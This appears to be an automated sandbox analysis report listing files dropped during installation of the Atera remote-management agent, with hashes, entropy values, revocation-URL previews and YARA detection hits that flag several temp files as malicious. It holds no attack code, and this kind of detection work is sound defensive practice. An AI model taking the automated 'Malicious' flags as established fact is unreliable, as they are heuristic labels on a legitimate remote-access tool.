                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):111002
                                                                                                                                                                                                                                                                          Entropy (8bit):6.451729490748972
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:kPzgm47BQL7ZMFPZ7t0zfIagnbSLDII+D61SdOkC7/:kbgN7BGFoZ7+gbE8pD61JL
                                                                                                                                                                                                                                                                          MD5:E43056855200281951812F3A6D94EFF7
                                                                                                                                                                                                                                                                          SHA1:66253EFEAE45E17339D00E2277A4E619E7E2FABC
                                                                                                                                                                                                                                                                          SHA-256:04A68A7F0A5E5AEE56899E2080B5E5C6FCC35564F470551E8FB2031C45F2B03F
                                                                                                                                                                                                                                                                          SHA-512:B98CAAD890078D0FE69F35176AB294380D98B480E6BD973DA10EE31B175E63A53C5E4DFB61405B7FAB85EA5D5FB01C4869287B70D7FE2F3F50F619C313F8911C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):471
                                                                                                                                                                                                                                                                          Entropy (8bit):7.187019651177751
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:JyYOzg5GLsHzqTykJ0Ysbwsn5SWPYkq3n:JRO0ILsyJ0Y+Z5lYn
                                                                                                                                                                                                                                                                          MD5:441A4996E2EE86C4B588D8C0D407E7C2
                                                                                                                                                                                                                                                                          SHA1:0987D79EAECF4AFAD0E5C6F7BD9BD0A90CEABBD4
                                                                                                                                                                                                                                                                          SHA-256:300CFA12D5560F2B04E870FE42E15B6A2007E8F53E4CE1329BD506382075E657
                                                                                                                                                                                                                                                                          SHA-512:8D6D5BD1EA7BAAFEB8CA750CE112ED7FAD1477E1DEEF34994A145893EED217D1A9990A52D76790F8C00484378778504626E5C6A5F5193B8DA661AFDBD62600B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):71954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):727
                                                                                                                                                                                                                                                                          Entropy (8bit):7.537072345098989
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:5o6Tq9R5h44TUqrqILBKSB/P8KcFHiGIkZEaOR6qtcO4CoTBF/ZW9FD1QvuTw/n/:54oqXVKSBH8KqiGZtfqiOboTBF4l1ve/
                                                                                                                                                                                                                                                                          MD5:49BA85BE2CB152368FE6EE8982CF3D76
                                                                                                                                                                                                                                                                          SHA1:F078FDB44C9C62D64DC79849C7E41DEC4441A9C0
                                                                                                                                                                                                                                                                          SHA-256:28B91A2A15DFCE2BB789D5CF10E55DC8D46418AF6E8574CBA83CCAD4D396BE68
                                                                                                                                                                                                                                                                          SHA-512:67F5293A94BF17ED5031EEC51EE06BBC467860CDC48A2712694418185C0D400386BCD3D3C4FB46E7B5E50EEE1A6A4747707A3058D0C982B4CB16E8374816E787
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):737
                                                                                                                                                                                                                                                                          Entropy (8bit):7.5557187233228245
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:yeRLaWQMnFQlRAUcncFfBJurIT/L3wH/c9q5kvs0LQ+TDOFbx2UJhE47J:y2GWnSxuctGeqiW+Lp6L2ehE47J
                                                                                                                                                                                                                                                                          MD5:3DE65469B9F550FA32724673E299DFE2
                                                                                                                                                                                                                                                                          SHA1:4AAA64A5E233B459C3D4A5BCDD6EB115990C880D
                                                                                                                                                                                                                                                                          SHA-256:36BD170660F76039F65092E3CFB6F5AE7E6CE34E8E7321FABA7059E8407E3EB8
                                                                                                                                                                                                                                                                          SHA-512:642459FD1971BD4EBBC4C7128515F15D1F8AF15FE9AA5E992BDA18BB25B5913F3C36FCB1D9CA9D184C58F92295639976E3ECED7FEE5DEBB672C8F230EB31CD6E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1716
                                                                                                                                                                                                                                                                          Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                          MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                          SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                          SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                          SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):727
                                                                                                                                                                                                                                                                          Entropy (8bit):7.534031201200033
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:5onfZUxc5RlRtBfQOx/hsLzjyNiA6M4SjmFjt5Y1DohqGoz7UcN/YNjoRLUE2lH2:5iCxcdZbxJqjFJ5mDohqocRYN7latn
                                                                                                                                                                                                                                                                          MD5:3AA154C597F0D3EF221B82298CE04F78
                                                                                                                                                                                                                                                                          SHA1:C15D53176E903BFAB12665B3E42D1B9ECCFB54D0
                                                                                                                                                                                                                                                                          SHA-256:B75A76C1C71E981D5299E2A8F85D317D14DA91FD79A615C70EF14876EBC9557D
                                                                                                                                                                                                                                                                          SHA-512:B9B93ED7F99E8B96EFB85A4DC9A8CEE9F7057B87DA9C2A1FE82FE8CD308F89C42E76E9170BB429999E1D985AF7847463B8C60173C44413685472E0B5E2306324
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1428
                                                                                                                                                                                                                                                                          Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                          MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                          SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                          SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                          SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):306
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8894944626035475
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKZPWsDL6T/lSrs0d5DRAUSW0P3PeXJUwh8lmi36lImJGelN:3L+/IrHd51xSW0P3PeXJUZ6NXlN
                                                                                                                                                                                                                                                                          MD5:F23F54EA8D61AC2B6E5891B11BDFF6C1
                                                                                                                                                                                                                                                                          SHA1:10E5BF1B21A3545506EA567F91707271DA2E41AD
                                                                                                                                                                                                                                                                          SHA-256:8A074C5618C1DE918BB7847EBFBB16623633611753AEE6D793FFB4D6D3660ADC
                                                                                                                                                                                                                                                                          SHA-512:7A3B1152E2A64C6D524836B2FDE0A9523E7980F9FE9D4F6242C2C173E4E1F7D576F9375091BFC3496B4FA5F2D910204B8CDA2527D444C2F26A910E279698CD97
                                                                                                                                                                                                                                                                          Malicious:false
Preview (readable UTF-16 strings only): http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl "6741d55d-1b19a"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):338
                                                                                                                                                                                                                                                                          Entropy (8bit):3.431815599541661
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKg48CODJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:44KIkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                          MD5:B789644DE46E6501E73D343E54CA0001
                                                                                                                                                                                                                                                                          SHA1:FF53F111EDCDD0A35366EA0312D9C3115346C2F8
                                                                                                                                                                                                                                                                          SHA-256:247A15E7B4806C0BEFBEEB07BAA092D5C31754D3F5AB0346F4EA2EBCABC55631
                                                                                                                                                                                                                                                                          SHA-512:A8FC877F1FDD2F4128E5B2E06A20DF8163A04A0166935690EB51590AEE6C4DDC9C7C2B4AD7881F44F741894E67F1C8CC7E8EDB57F1DD10370C459B1D247523BD
                                                                                                                                                                                                                                                                          Malicious:false
Preview (readable UTF-16 strings only): http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab "746787a3f0d91:0"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):400
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9245594820040686
                                                                                                                                                                                                                                                                          Encrypted:false
Malicious:false
Preview:p...... ............Y>..(................~...=....o.ZC....................o.ZC.. .........ALW>.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:data
Category:dropped
Size (bytes):290
Entropy (8bit):2.9844219596585932
Encrypted:false
Malicious:false
Preview:p...... .........}.._>..(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:data
Category:dropped
Size (bytes):404
Entropy (8bit):3.544652119294851
Encrypted:false
Malicious:false
Preview:p...... .... ...>[.7....(....................................................... ...........O>.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:data
Category:dropped
Size (bytes):248
Entropy (8bit):3.016482586660896
Encrypted:false
Malicious:false
Preview:p...... ....f...0.......(....................................................... ........T.~.:.. ...................h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.l...".6.7.3.d.0.d.e.d.-.2.e.1."...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:data
Category:dropped
Size (bytes):308
Entropy (8bit):3.2220888806886414
Encrypted:false
Malicious:false
Preview:p...... .........j..^>..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:data
Category:dropped
Size (bytes):412
Entropy (8bit):3.5596195368537855
Encrypted:false
Malicious:false
Preview:p...... ....(......'....(....................................................... ........).?W>.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:data
Category:dropped
Size (bytes):254
Entropy (8bit):3.060772882719261
Encrypted:false
Malicious:false
Preview:p...... ....l.......^>..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
File Type:CSV text
Category:dropped
Size (bytes):1944
Entropy (8bit):5.343420056309075
Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                                                          MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                                                          SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                                                          SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                                                          SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):69632
                                                                                                                                                                                                                                                                          Entropy (8bit):0.14727313070261788
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CnjEubmStedGPdGeqISoedGPdGfMpr7MOOV:ijNyLIBoV
                                                                                                                                                                                                                                                                          MD5:8B75DCDB078C3657C0CB2415C20C2944
                                                                                                                                                                                                                                                                          SHA1:39EEB1D55B0CC800724B9402A7E5602F9D5C016A
                                                                                                                                                                                                                                                                          SHA-256:E2F7421A5749B64489718CA52EDF7099A9A20F5A6847D97379F1B0F0FFD4D3A3
                                                                                                                                                                                                                                                                          SHA-512:5255152B8C3988592E90F1F0C9DD8C7187831306BBB72BFAB2935F5AC88C8065DEE044EEA3CF70ED474DD6E8B3793A4483CF1B7A1D1079B54B888F352AA5D4D8
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9340E6CB357EA061.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2604139244452048
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:ZCgFukUPveFXJ7T5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:lFTjTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:A60126BE7FFB5493321FA40BDDCD1F01
                                                                                                                                                                                                                                                                          SHA1:F3FC1B5AEE0DABE79D446355EEDD10935A5A84E5
                                                                                                                                                                                                                                                                          SHA-256:61F9983069445C8E242EDF5D1E36054B163F10E2DE5BD7230A11BB12B4E8CF47
                                                                                                                                                                                                                                                                          SHA-512:E7310B82E0771A6A64EE8212E49780DBBF89FF8BF56F2513B689FD993A187969B98F01117B0249498123F6122F2B80FCDFDD6C86EB0A92FEB19C9D44D378FFDA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF975FD2E2CDD5436E.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2604139244452048
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:ZCgFukUPveFXJ7T5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:lFTjTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:A60126BE7FFB5493321FA40BDDCD1F01
                                                                                                                                                                                                                                                                          SHA1:F3FC1B5AEE0DABE79D446355EEDD10935A5A84E5
                                                                                                                                                                                                                                                                          SHA-256:61F9983069445C8E242EDF5D1E36054B163F10E2DE5BD7230A11BB12B4E8CF47
                                                                                                                                                                                                                                                                          SHA-512:E7310B82E0771A6A64EE8212E49780DBBF89FF8BF56F2513B689FD993A187969B98F01117B0249498123F6122F2B80FCDFDD6C86EB0A92FEB19C9D44D378FFDA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.5756843868543453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CJ8Ph9uRc06WXJKFT5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:Nh91BFTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:D36078FC13607F98C31714BEC1ECEABA
                                                                                                                                                                                                                                                                          SHA1:2E863BE55D1FEEA70F4DCF32A46E754C1C7015FE
                                                                                                                                                                                                                                                                          SHA-256:2B33B8B1305B5C18EFAB55AE78BB813B5E465A9BE8365ABB098CD7DE526E0DC1
                                                                                                                                                                                                                                                                          SHA-512:6CFA4F0CA554583F2FD0097236A02083D3029DDA64C39B9FC9B6B9972DB499A0E936220CAE802F85F81F3D9EB6016C3914E71F7B97C1CB5CC949069505F4765C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFC5872F544B03548F.TMP, Author: Joe Security
